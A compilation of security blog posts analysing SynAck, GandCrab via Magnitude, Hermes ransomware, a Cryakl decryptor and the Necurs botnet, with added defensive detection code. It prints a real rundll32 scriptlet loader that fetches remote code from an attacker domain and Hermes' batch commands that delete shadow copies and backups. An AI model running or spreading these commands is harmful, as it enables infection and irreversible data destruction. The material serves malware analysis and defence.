SynAck ransomware: The doppelgängster

Malware tends to evolve, with crooks adding new functions and techniques to help it avoid detection by antivirus programs. Sometimes, the evolution is rather rapid. For example, SynAck ransomware, which has been known since September 2017 (when it was just average, not particularly clever), has recently been overhauled to become a very sophisticated threat that avoids detection with unprecedented effectiveness and uses a new technique called Process Doppelgänging.


Sneak attack

Malware creators commonly use obfuscation — attempts to make the code unreadable so that antiviruses will not recognize the malware — typically employing special packaging software for that purpose. However, antivirus developers caught on, and now antivirus software effortlessly unpacks such packages. The developers behind SynAck chose another way that requires more effort on both sides: thoroughly obfuscating the code before compiling it, making detection significantly harder for security solutions.

That’s not the only evasion technique the new version of SynAck uses. It also employs a rather complicated Process Doppelgänging technique — and it is the first ransomware seen in the wild to do so. Process Doppelgänging was first presented at Black Hat 2017 by security researchers, after which it was picked up by malefactors and used in several malware species.

Process Doppelgänging relies on some features of the NTFS file system and a legacy Windows process loader that exists in all Windows versions since Windows XP, letting developers create fileless malware that can pass off malicious actions as harmless, legitimate processes. The technique is complicated; to read more about it, see Securelist’s more detailed post on the topic.

SynAck has two more noteworthy features. First, it checks if it’s installed in the right directory. If it’s not, it doesn’t run — that’s an attempt to avoid detection by the automatic sandboxes various security solutions use. Second, SynAck checks if it’s installed on a computer with a keyboard set to a certain script — in this case, Cyrillic — in which case it also does nothing. That’s a common technique for restricting malware to specific regions.


The usual crime

From the user’s perspective, SynAck is just more ransomware, notable mainly for its steep demand: $3,000. Before encrypting a user’s files, SynAck ensures it has access to its important file targets by killing some processes that would otherwise keep the files in use and off limits.

The victim sees the ransom note, including contact instructions, on the logon screen. Unfortunately, SynAck uses a strong encryption algorithm, and no flaws have been found in its implementation, so there is no way yet to decrypt the encrypted files.

We have seen SynAck distributed mostly by Remote Desktop Protocol brute force, which means it’s mostly targeted at business users. The limited number of attacks thus far — all of them in the USA, Kuwait, and Iran — bears out this hypothesis.


Getting ready for the next generation of ransomware

Even if SynAck is not coming for you, its existence is a clear sign that ransomware is evolving, becoming more and more sophisticated and harder to protect against. Decryptor utilities will appear less frequently as attackers learn to avoid the mistakes that made the creation of those decryptors possible. And despite ceding ground to hidden miners (just as we predicted), ransomware is still a big global trend, and knowing how to protect against all such threats is a must for every Internet user.

Author: Alex Perekalin

Magnitude exploit kit switches to GandCrab ransomware

The GandCrab ransomware is reaching far and wide via malspam, social engineering schemes, and exploit kit campaigns. On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber, which was extremely thorough at avoiding other geolocations.

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. Variations of this technique have been known for several years and used by other families such as Poweliks, but they are a new addition to Magnitude.

Figure 1: Magnitude EK traffic capture with the GandCrab payload

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding, or more recently via another technique, but still exposing it “in the clear” from traffic or network packet capture.

Figure 2: Magnitude EK dropping Magniber on April 4, 2018

The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriptlet that is later decoded in memory and executed.

"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject('script:http://dx30z30a4t11l7be.lieslow[.]faith/5aad4b91a0da20d4faab0991bdbe7138')

Figure 3: Innocuous scriptlet hides the payload

After the payload is injected into explorer.exe, it immediately attempts to reboot the machine. If we suspend that process and use @hasherezade‘s PE-Sieve, we can actually dump the GandCrab DLL from memory:

Figure 4: Extracting the payload from memory using PE-Sieve

Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.

Figure 5: GandCrab’s ransom note

A recent law enforcement operation provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.

Malwarebytes users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.

Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.

Indicators of compromise

Dumped GandCrab DLL

9daf74238f0f7d0e64f8bb046c136d7e61346b4c084a0c46e174a2b76f30b57a

The post Magnitude exploit kit switches to GandCrab ransomware appeared first on Malwarebytes Labs.

Author: Jérôme Segura

Hermes ransomware distributed to South Koreans via recent Flash zero-day

This blog post was authored by @hasherezade, Jérôme Segura and Vasilios Hioureas.

At the end of January, the South Korean Emergency Response Team (KrCERT) published news of a Flash Player zero-day used in targeted attacks. The flaw, which exists in Flash Player 28.0.0.137 and below, was distributed via malicious Office documents containing the embedded Flash exploit. Only a couple of weeks after the public announcement, spam campaigns were already beginning to pump out malicious Word documents containing the newly available exploit.

While spam has been an active distribution channel for some time now, the news of a Flash exploit would most certainly interest exploit kit authors as well. Indeed, in our previous blog post about this vulnerability (CVE-2018-4878), we showed how trivial it was to take an already available Proof-of-Concept and package it as a drive-by download instead.

On March 9th, MDNC discovered that a less common but more sophisticated exploit kit called GreenFlash Sundown had started to use this recent Flash zero-day to distribute the Hermes ransomware. This payload was formerly used as part of an attack on a Taiwanese bank and is suspected to be the work of a North Korean hacking group. According to some reports, it may be a decoy attack and “pseudo-ransomware”.

By checking the indicators published by MDNC, we were able to identify this campaign within our telemetry and noticed that all exploit attempts were made against South Korean users. Based on our records, the first hit happened on February 27, 2018 (01:54 UTC) via a compromised Korean website.

We replayed this attack in our lab and spent a fair amount of time looking for redirection code within the JavaScript libraries that were part of the self-hosted OpenX server. Instead, we found that it was hiding in the main page’s source code.

We had already pinpointed where the redirection was happening by checking the DOM on the live page, but we also confirmed it by decoding the large malicious blurb that went through Base64 and RC4 encoding (we would like to thank David Ledbetter for that).

Hermes ransomware

The payload from this attack is Hermes ransomware, version 2.1.

Behavioral analysis

The ransomware copies itself into %TEMP% under the name svchosta.exe and redeploys itself from that location. The initial sample is then deleted.

The ransomware is not particularly stealthy—some windows pop up during its run. For example, we are asked to run a batch script with administrator privileges:

The authors didn’t bother to deploy any UAC bypass technique, relying only on social engineering for this. The pop-up is deployed in a loop, and in this way it tries to force the user into accepting it. But even if we don’t let the batch script be deployed, the main executable proceeds with encryption.

The batch script is responsible for removing the shadow copies and other possible backups:

It is dropped inside C:\Users\Public along with some other files:

The file “PUBLIC” contains a blob with an RSA public key. It is worth noting that this key is unique on each run, so the RSA key pair is generated per victim. Example:

Another file is an encrypted block of data named UNIQUE_ID_DO_NOT_REMOVE. It is a blob containing an encrypted private RSA key, unique for the victim:

Analyzing the blob header, we find the following information:

The rest of the data is encrypted—at this moment, we can guess that it is encrypted by the RSA public key of the attackers.

The same folder also contains a ransom note. When encryption has finished, the ransom note pops up. The note is in HTML format, named DECRYPT_INFORMATION.html.

The interesting fact is that, depending on the campaign, in some of the samples the authors used BitMessage to communicate with victims:

This method was used in the past by a few other authors, for example in Chimera ransomware, and by the author of original Petya in his affiliate programs.

Encrypted files don’t have their names changed. Each file is encrypted with a new key—the same plaintext produces different ciphertexts. The entropy of the encrypted file is high, and no patterns are visible. That suggests that some stream cipher or a cipher with chained blocks was used. (The most commonly used in such cases is AES in CBC mode, but we can be sure only after analyzing the code.) Below, you can see a visualization of a BMP file before and after being encrypted by Hermes:


Inside each file, after the encrypted content, there is a “HERMES” marker, followed by another blob:

This time the blob contains an exported session key (0x01 : SIMPLEBLOB) and the algorithm identifier is AES (0x6611: CALG_AES). We can make an educated guess that it is the AES key for the file, encrypted by the victim’s RSA key (from the generated pair).

The ransomware achieves persistence by dropping a batch script in the Startup folder:

The script is simple; its role is just to deploy the dropped ransomware: svchosta.exe.

So, on each system startup it will check for new, unencrypted files and try to encrypt them. That’s why, as soon as one discovers that they have been attacked by this ransomware, they should remove the persistence entry so that the attack does not repeat itself.

Inside the ransomware

Execution flow

At the beginning of the execution, the ransomware creates a mutex named “tech”:

The sample is mildly obfuscated, for example, its imports are loaded at runtime. The .data section of the PE file is also decrypted during the execution, so, at first we will not see the typical strings.

First, the executable begins to dynamically load all its imports via a function at 4023e0:

It then checks the registry key for a language code. If Russian, Belarusian, or Ukrainian is found as the system language, it exits the process (0x419 being Russian, 0x422 Ukrainian, and 0x423 Belarusian).

It then creates two cmd.exe subprocesses: one copies the executable into the directory appdata/local/temp/svchost.exe, and the other executes the copied file.

It also generates crypto keys using the standard CryptAcquireContext family of Crypto API calls, and saves the public key and some kind of ID into the following files:

C:\Users\Public\UNIQUE_ID_DO_NOT_REMOVE

C:\Users\Public\PUBLIC

As mentioned earlier, it writes a script with the contents start “” %TEMP%\svchosta.exe into the Start menu Startup folder so that it auto-runs on startup. This is quite simple and conspicuous. Since it is always running and keeps persistence, it makes sense that it saved the public key into a file: it can later find that key and continue encrypting with a consistent key throughout all executions.

Below is the function that calls all of this functionality sequentially, labeled:

It proceeds to cycle through all available drives, skipping any drive that is a CD-ROM. Inside the function, it walks all files and folders on the drive but skips a few key directories, including (but not limited to) Windows, Mozilla, and the Recycle Bin.

Inside of the function labeled recursiveSearch_Encrypt are the checks for key folders and drive type:

It then continues on to enumerate network resources (netResources) and encrypts those files as well. After encryption, it creates another bat file called window.bat to delete shadow volumes and backup files. Here is its content:

vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup\*.* c:\backup\*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup\*.* d:\backup\*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup\*.* e:\backup\*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup\*.* f:\backup\*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup\*.* g:\backup\*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup\*.* h:\backup\*.* h:\*.set h:\*.win h:\*.dsk
del %0

It then creates and executes another bat file called svchostaaexe.bat that cycles through the entire file system again to search for and delete all backup files. This is interesting, as we have rarely seen ransomware looking in so much detail for backup files.
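The two process-level behaviours quoted on this page, Magnitude's rundll32 javascript: scriptlet loader and the vssadmin/del commands in Hermes' window.bat, turned into detection logic that a SOC could run over process-creation telemetry. This is an added example, not code from either post; the events are constructed (Sysmon-style Image/CommandLine fields) and use a placeholder host in place of the real scriptlet URL.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    command_line: str


# Each rule: (name, severity, image-basename regex, command-line regex).
# Command-line matching is case-insensitive because batch files vary case.
RULES = [
    # Magnitude: rundll32 abusing mshtml's RunHTMLApplication to run inline
    # JavaScript that fetches a remote scriptlet via GetObject('script:...').
    ("rundll32_inline_script_loader", "high", r"^rundll32\.exe$",
     r"javascript:|RunHTMLApplication|GetObject\(\s*['\"]script:"),
    # Hermes window.bat: wipe every shadow copy.
    ("vssadmin_delete_shadows", "high", r"^vssadmin\.exe$",
     r"delete\s+shadows"),
    # Hermes window.bat: shrink shadow storage (purging copies), then reset it.
    ("vssadmin_resize_shadowstorage", "medium", r"^vssadmin\.exe$",
     r"resize\s+shadowstorage.*/maxsize="),
    # Hermes window.bat: recursive, forced deletion of backup artefacts.
    ("cmd_backup_file_wipe", "high", r"^cmd\.exe$",
     r"del\s+(?:/[sfq]\s+)+.*\.(?:vhd|bac|bak|wbcat|bkf|set|win|dsk)\b"),
]
COMPILED = [(n, s, re.compile(i, re.I), re.compile(c, re.I))
            for n, s, i, c in RULES]


def scan_event(image: str, command_line: str) -> List[Finding]:
    """Return every rule that matches a single process-creation event."""
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1]
    return [Finding(name, sev, command_line)
            for name, sev, img_re, cmd_re in COMPILED
            if img_re.search(basename) and cmd_re.search(command_line)]


def scan_events(events: List[Dict[str, str]]) -> List[Finding]:
    """Scan a list of {"Image": ..., "CommandLine": ...} events in order."""
    findings: List[Finding] = []
    for ev in events:
        findings.extend(scan_event(ev["Image"], ev["CommandLine"]))
    return findings


# Constructed sample events modelled on the command lines quoted above;
# the scriptlet host is a hypothetical placeholder, not the real one.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";'
                    r"document.write();GetObject('script:http://scriptlet-host.example.invalid/x')"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin Delete Shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf"},
    # Benign controls: an ordinary rundll32 call and a read-only vssadmin query.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin list shadows"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.command_line}")
```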

There is no functionality that communicates a decryption key to a C2 server. This means that the file UNIQUE_ID_DO_NOT_REMOVE, which contains the unique ID the victim has to send to the email address, must be encrypted with a public key whose key pair the attackers pre-generated and retained on their side.

We have found that there is a heavy code reuse from the old versions of Hermes with this one. The flow of the code looks to be a bit different, but the overall functionality is the same. This is quite clear when comparing the two versions in a disassembler.

Below are two screenshots: the first from the current version we are analyzing, and the second from the old version. You can clearly see that even though the flow and arrangement are a bit different, the functionality remains mostly the same.

The new version:

And the old version 237eee069c1df7b69cee2cc63dee24e6:

Attacked targets

The ransomware attacks the following extensions:

tif php 1cd 7z cd 1cd dbf ai arw txt doc docm docx zip rar xlsx xls xlsb xlsm jpg jpe jpeg bmp db eql sql adp mdf frm mdb odb odm odp ods dbc frx db2 dbs pds pdt pdf dt cf cfu mxl epf kdbx erf vrp grs geo st pff mft efd 3dm 3ds rib ma max lwo lws m3d mb obj x x3d c4d fbx dgn dwg 4db 4dl 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr bak cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd fcd fic fid fil fm5 fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx abw act aim ans apt asc ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crwl cyi dca dgs diz dne docz dot dotm dotx dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mell min mnt msg mwp nfo njx now nzb ocr odo odt ofl oft ort ott p7s pfs pfx pjt prt psw pu pvj pvm pwi pwr qdl rad rft ris rng rpt rst rt rtd rtf rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa stw sty sub sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof uot upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xdl xlf xps xwp xy3 xyp xyw ybk yml zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv djvu dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih 
gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpgl hpl idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfv pl plt vrml pobj psid rdl scv sk1 sk2 ssk stn svf svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wpg vsm xar yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save ssfn t2b tb0 tbn tfc tg4 thm tjp tm2 tn tpi ufo uga vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb wpe wvl x3f y ysp zif cdr4 cdr6 cdrw ddoc css pptm raw cpt pcx pdn png psd tga tiff tif xpm ps sai wmf ani flc fb3 fli mng smil svg mobi swf html csv xhtm dat

Encryption

Hermes, like many other ransomware, uses AES along with RSA for the encryption. AES is used to encrypt files with a random key. RSA is used to protect the random AES key.

The ransomware uses two RSA key pairs, one being the attackers’ hardcoded RSA public key.

Then, there is a keypair for the victim. It is generated at the beginning of the attack. The private key from this key pair is encrypted by the attackers’ public key and stored in the file UNIQUE_ID_DO_NOT_REMOVE.

When the victim sends this file, the attackers can recover the victim’s private key with the help of their own private key. The victim’s public key is stored in PUBLIC in clear text. It is later used to encrypt random AES keys, generated per file.

Cryptography is implemented with the help of Windows Crypto API. Function calls are mildly obfuscated, and pointers to the functions are manually loaded.

Processing of each file starts by checking whether it was already encrypted. The ransomware uses the saved marker “HERMES” that we already saw during the behavioral analysis. The marker is stored at the end of the file, before the block where the AES key is saved; its offset is 274 bytes from the end. So the file pointer is first set to that position to check the characters there.

If the marker was found, the file is skipped. Otherwise, it is processed further. As we noticed during the behavioral analysis, each file is encrypted with a new key. Looking at the code, we can find the responsible function. Unfortunately for the victims, the authors used the secure function CryptGenKey:

The identifier used for the algorithm is 0x6610 (CALG_AES_256), meaning AES with a 256-bit key. This key is used to encrypt the content of the file, which is read and encrypted in chunks of 1,000,000 bytes each.

At the end, the marker “HERMES” is written and the exported AES key is saved:

The handle to the attacker’s RSA public key is passed, so the function CryptExportKey automatically takes care of protecting the AES key. Only the owner of the RSA private key will be able to import it back.
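A forensic check for the Hermes trailer described above (the “HERMES” marker 274 bytes from the end of the file, followed by the exported SIMPLEBLOB with an AES ALG_ID), usable for triaging which files on a disk image were touched. This is an added example, not code from the analysis: the BLOBHEADER layout is the documented CryptoAPI one, and the 256-byte length assumed for the RSA-wrapped AES key is an inference from 6 + 8 + 4 + 256 = 274, not something the post states.

```python
import struct
from typing import Dict, Optional

MARKER = b"HERMES"
TRAILER_LEN = 274          # marker offset from end of file, per the analysis
SIMPLEBLOB = 0x01          # BLOBHEADER.bType for an exported session key
CUR_BLOB_VERSION = 0x02    # BLOBHEADER.bVersion
CALG_AES_256 = 0x6610      # key generated with CryptGenKey(CALG_AES_256)
CALG_AES = 0x6611          # generic AES id, as seen in the blob dump
CALG_RSA_KEYX = 0xA400     # SIMPLEBLOB: ALG_ID of the RSA key that wraps the AES key
# Assumption: the remaining bytes are one RSA-2048 ciphertext (256 bytes).
ENC_KEY_LEN = TRAILER_LEN - len(MARKER) - 8 - 4


def parse_hermes_trailer(data: bytes) -> Optional[Dict[str, int]]:
    """Return the parsed trailer if `data` carries a Hermes trailer, else None.

    Layout of the last 274 bytes (little-endian, as CryptoAPI writes it):
      "HERMES" | BLOBHEADER{bType:u8, bVersion:u8, reserved:u16, aiKeyAlg:u32}
      | ALG_ID of the wrapping key:u32 | encrypted AES key (assumed 256 bytes)
    """
    if len(data) < TRAILER_LEN:
        return None                     # too small to hold a trailer at all
    trailer = data[-TRAILER_LEN:]
    if not trailer.startswith(MARKER):
        return None                     # no marker: file was not encrypted
    btype, bversion, reserved, key_alg = struct.unpack_from("<BBHI", trailer, len(MARKER))
    (wrap_alg,) = struct.unpack_from("<I", trailer, len(MARKER) + 8)
    enc_key = trailer[len(MARKER) + 12:]
    if btype != SIMPLEBLOB or bversion != CUR_BLOB_VERSION or reserved != 0:
        return None                     # marker present but header malformed
    if key_alg not in (CALG_AES, CALG_AES_256):
        return None                     # not an AES session key blob
    return {
        "key_alg": key_alg,
        "wrap_alg": wrap_alg,
        "encrypted_key_len": len(enc_key),
        "ciphertext_len": len(data) - TRAILER_LEN,
    }


def build_sample(ciphertext: bytes, key_alg: int = CALG_AES_256) -> bytes:
    """Construct a synthetic Hermes-style file for testing (no real crypto)."""
    header = struct.pack("<BBHI", SIMPLEBLOB, CUR_BLOB_VERSION, 0, key_alg)
    wrap = struct.pack("<I", CALG_RSA_KEYX)
    fake_enc_key = bytes(range(ENC_KEY_LEN))   # stand-in for the wrapped AES key
    return ciphertext + MARKER + header + wrap + fake_enc_key


def triage(files: Dict[str, bytes]) -> Dict[str, bool]:
    """Map each file name to whether it carries a valid Hermes trailer."""
    return {name: parse_hermes_trailer(blob) is not None for name, blob in files.items()}


if __name__ == "__main__":
    # Constructed inputs: one synthetic encrypted file and one untouched file.
    sample = {"report.docx": build_sample(b"\xaa" * 1000), "notes.txt": b"hello"}
    for name, hit in triage(sample).items():
        print(f"{name}: {'HERMES trailer' if hit else 'clean'}")
```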

Protection

Malwarebytes users are protected against this Flash Player exploit. In addition, the ransomware payload was blocked at zero-hour strictly based on its malicious behaviour.

Conclusion

Another campaign that we know of targeting South Koreans specifically is carried by malvertising and uses the Magnitude exploit kit, which also delivers ransomware—namely Magniber. That particular infection chain goes to great lengths to only infect this particular demographic, via geo-aware traffic redirection and language checks within the malware code itself.

After analyzing the sample, we found it to be a fully functional ransomware. However, we cannot be sure what the real motivations of the distributors were. Looking at the full context, we may suspect that it was politically motivated rather than a profit-driven attack.

Although the infection vector appeared to narrow down to South Korea, the malware itself, unlike Magniber, does not specifically target these users. The fact that the ransomware excludes certain countries like Russia or Ukraine could tie the development and outsourcing of the malware to these areas or be a false flag. As we know, attribution is always a complex topic.

Indicators of compromise

Domains involved in campaign:


IP addresses:

  • 159.65.131[.]94
  • 207.148.104[.]5

Hermes 2.1 ransomware:

  • A5A0964B1308FDB0AEB8BD5B2A0F306C99997C7C076D66EB3EBCDD68405B1DA2
  • pretty040782@gmail[.]com
  • pretty040782@keemail[.]me

The post Hermes ransomware distributed to South Koreans via recent Flash zero-day appeared first on Malwarebytes Labs.

Author: Malwarebytes Labs

Cryakl/Fantomas victims rescued by new decryptor

The No More Ransom project for assisting victims of ransomware has good news to report: The Belgian police, in cooperation with Kaspersky Lab, managed to obtain keys for recovering files encrypted with new versions of Cryakl ransomware, also known as Fantomas. The updated decryption tool is already available on the project’s website.


What is Cryakl?

The Trojan ransomware Cryakl (Trojan-Ransom.Win32.Cryakl) has been . At first, it was distributed through attached archives in e-mails that appeared to come from an arbitration court in connection with some alleged wrongdoing. There is something about such messages that sets nerves to jangling, and even those who know better might be inclined to click on the attachment. Later, the e-mails diversified, looking like messages from other organizations, such as a local homeowners’ association.

When encrypting files on a victim’s computer, Cryakl creates a long key that it sends to a command-and-control C&C server. Without this key, it is nearly impossible to recover files impacted by the malware. After that, Cryakl replaces the desktop wallpaper with contact details for its creators together with a ransom demand. Cryakl also displays an image of the mask of the 1964 French movie villain Fantomas, hence its alternative name. Cryakl mostly targeted users in Russia, so information about it is mostly available in Russian.


Success story

As we already said, the joint efforts of our experts and Belgian police resulted in obtaining the master keys. The investigation began when the computer crime unit learned about victims of the ransomware in Belgium, and then they discovered a C&C server in a neighboring country. An operation led by the Belgian federal prosecutor neutralized the server, along with several other C&C servers that received master keys from infected machines. Then Kaspersky Lab stepped in to assist the law enforcement agencies, not for the first time. As before, the results were first-class: Our experts helped analyze the data found and extract the decryption keys.

The keys have already been added to the RakhniDecryptor tool on the No More Ransom website, and the Belgian federal police is now an official partner of the project. No More Ransom, which has been running since July 2016, has to date provided free help to tens of thousands of people in decrypting files rendered unusable by ransomware, and deprived cyberblackmailers of at least 10 million euros of potential booty.


How to rescue files encrypted by Cryakl ransomware

The No More Ransom site offers two tools for decrypting files corrupted by Cryakl. One, named RannohDecryptor and around since 2016, is for older versions of Cryakl. You can download it at NoMoreRansom.org, and get decryption instructions here.

We recently updated the second tool, RakhniDecryptor, by adding the master keys from the servers seized by the Belgian police. It can be downloaded from the same site; instructions are available here. RakhniDecryptor is needed to decrypt files hit by newer versions of Cryakl. Either one of the tools should restore Cryakl-infected files to full health.

How to stay safe in the future

When dealing with cryptoransomware, prevention is far cheaper and simpler than a cure. In other words, it’s better to secure yourself now and sleep easy than to mess around with file decryption. We’d like to share a few preemptive file protection tips:

1. Always keep a copy of your most important files somewhere else: in the cloud, on another drive, on a memory stick, or on another computer. More details about backup options are available here.

2. Use reliable AV software. Some security solutions — for example, Kaspersky Total Security — can also assist with file backup.

3. Don’t download programs from suspicious sources. Their installers might contain something you’d rather not have on your computer.

4. Don’t open attachments in e-mails from unknown senders, even if they look important and credible. If in doubt, look up the phone number on the organization’s official website and call to check.

Author: Anna Markovskaya

The Many Tentacles of the Necurs Botnet

Introduction

Over the past five years the Necurs botnet has established itself as the largest purveyor of spam worldwide. Necurs is responsible for emailing massive amounts of banking malware, ransomware, dating spam, pump-n-dump stock scams, work from home schemes, and even cryptocurrency wallet credential phishing. Necurs sends so much spam that at times Necurs’ spam campaigns can make up more than 90% of the spam seen by Cisco Talos in one day.

To conduct a deeper analysis of Necurs, Talos extracted 32 distinct spam campaigns sent by Necurs between August 2017 and November 2017. The result was a collection of over 2.1 million spam messages, sent from almost 1.2 million distinct sending IP addresses in over 200 countries and territories.

Necurs Recipients

From an email marketing and delivery perspective, Necurs doesn’t appear to be too sophisticated. Necurs’ recipient database includes email addresses that have been harvested online, commonly deployed role-based accounts, as well as email addresses that appear to have been auto-generated. These are among the worst, most unreliable sources for obtaining email addresses, and any legitimate email marketer wouldn’t last a day mailing to addresses such as these. Of course, an illegitimate botnet such as Necurs has no such concerns. For many months the email addresses in Necurs’ database seemed to be largely static; Necurs hasn’t actively added any new addresses for at least the past year, possibly two years or more. In November of 2017, Necurs stopped mailing to many of the auto-generated accounts.

At one of my personal domains, Necurs has been seen mailing to addresses such as ‘equifax@’ – an email address that was originally stolen from Equifax years before the 2017 breach. Necurs also often mails to ‘thisisatestmessageatall@’, another email address I generated and put into the wild, long ago. There are also variations on other legitimate addresses, for example ‘aeson@’, ’20jaeson@’, and ‘eson@’, which are all variations on my address ‘jaeson@’. The number 20 was present at the beginning of many of Necurs’ recipients. Hex 20 corresponds with the space character and is used in percent-encoding, etc. This provides further indication of the harvested nature of these addresses.

Other addresses in Necurs’ mailing list appear to have been auto-generated. For example ‘EFgUYsxebG@’, ‘ZhyWaTmu@’, and ‘MTAyOvoYkx@’ have never been aliases at my domain that I’ve ever used, and the only mail these accounts ever receive comes from Necurs.

Necurs email received at an auto-generated email address

From our set of Necurs’ spam messages, Talos extracted only the user alias portion of the To: address. There are numerous email aliases, such as role-based addresses, that appear to be in Necurs’ recipient DB across many different recipient domains. Strangely, the list also included some odd email aliases deployed at multiple domains such as ‘unity_unity[0-9]@’, ‘petgord32truew@’, ‘iamjustsendingthisleter@’, ‘docs[0-9]@’, and others.

Email alias and the number of domains in our data in which that alias was found

